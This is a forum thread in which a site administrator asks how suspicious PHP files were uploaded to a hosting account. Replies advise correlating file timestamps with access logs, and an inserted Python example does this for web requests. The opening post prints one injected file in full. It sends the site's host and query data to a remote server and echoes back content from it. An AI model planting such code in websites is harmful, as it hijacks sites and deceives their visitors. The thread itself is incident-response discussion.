Find out how files were uploaded

Discussion in 'Security' started by ::Gomez::, Sep 13, 2016.

  1. ::Gomez::

    Hi, I am dealing with a security issue inside an account. Every day new files are uploaded to public_html and subfolders, with strange content inside.

    For example:

    /home/xxx/public_html/rtrfei.php
    /home/xxx/public_html/fdbs.php

    The content is pretty much the same in all of the files:

    PHP:
    <?php
    set_time_limit(0);

    header("Content-Type: text/html;charset=gb2312");
    date_default_timezone_set('PRC');
    $Remote_server = "http://www.example.date/";
    $host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
    $Content_mb = file_get_contents($Remote_server."/AK47/2.html?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

    echo $Content_mb;

    ?>

    I would like to know if there is any way of finding out how these files were uploaded (FTP, SCP, SSH, via a script on the server, etc.).

    I think this is the first step to be able to identify the root cause of this issue.

    I do have root access to the server.

    Thanks!
     
    #1 ::Gomez::, Sep 13, 2016
    Last edited by a moderator: Sep 13, 2016
  2. sparek-3

    You need to get a timestamp of when the files were placed on the server, then look for activity (cPanel access, FTP, web) around that same time. That will help lead you in the direction of how the files came to be on the server.
     
  3. NOC_Serverpoint

    You would just have to check network and file access logs on the server.
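
Added example (not part of any post in this thread): one way to apply the timestamp-then-logs approach from the two replies above to web activity, by listing POST/PUT requests logged within a window around a file's inode change time. It assumes the account's access log is in Apache combined format; the sample lines, IPs and request paths are constructed, and the function names are illustrative.

```python
import os
import re
import sys
from datetime import datetime, timedelta, timezone

# Apache combined log format: host ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample lines (documentation IPs, made-up paths), not from the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Sep/2016:04:11:58 -0300] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Sep/2016:04:12:05 -0300] "POST /old-app/upload.php HTTP/1.1" 200 31 "-" "curl/7.47"',
    '192.0.2.10 - - [13/Sep/2016:09:30:00 -0300] "POST /contact.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]


def change_time(path):
    """Inode change time (ctime) as an aware UTC datetime.

    ctime is used instead of mtime because mtime can be back-dated with
    touch/utime, while ctime is set by the kernel on every inode change.
    """
    return datetime.fromtimestamp(os.stat(path).st_ctime, timezone.utc)


def requests_near(log_lines, changed_at, window_s=120, methods=("POST", "PUT")):
    """Return sorted (time, ip, method, path, status) tuples for write-type
    requests logged within window_s seconds of changed_at (tz-aware)."""
    window = timedelta(seconds=window_s)
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, ts, method, path, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if method in methods and abs(when - changed_at) <= window:
            hits.append((when, ip, method, path, int(status)))
    return sorted(hits)


if __name__ == "__main__" and len(sys.argv) == 3:
    # usage: script.py <suspicious file> <access log>  (both paths supplied by you)
    with open(sys.argv[2], errors="replace") as fh:
        for hit in requests_near(fh, change_time(sys.argv[1])):
            print(*hit)
```

An empty result means no web write request was logged in that window, so the FTP and cPanel access logs are the next place to apply the same time window.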
     
  4. cPanelMichael
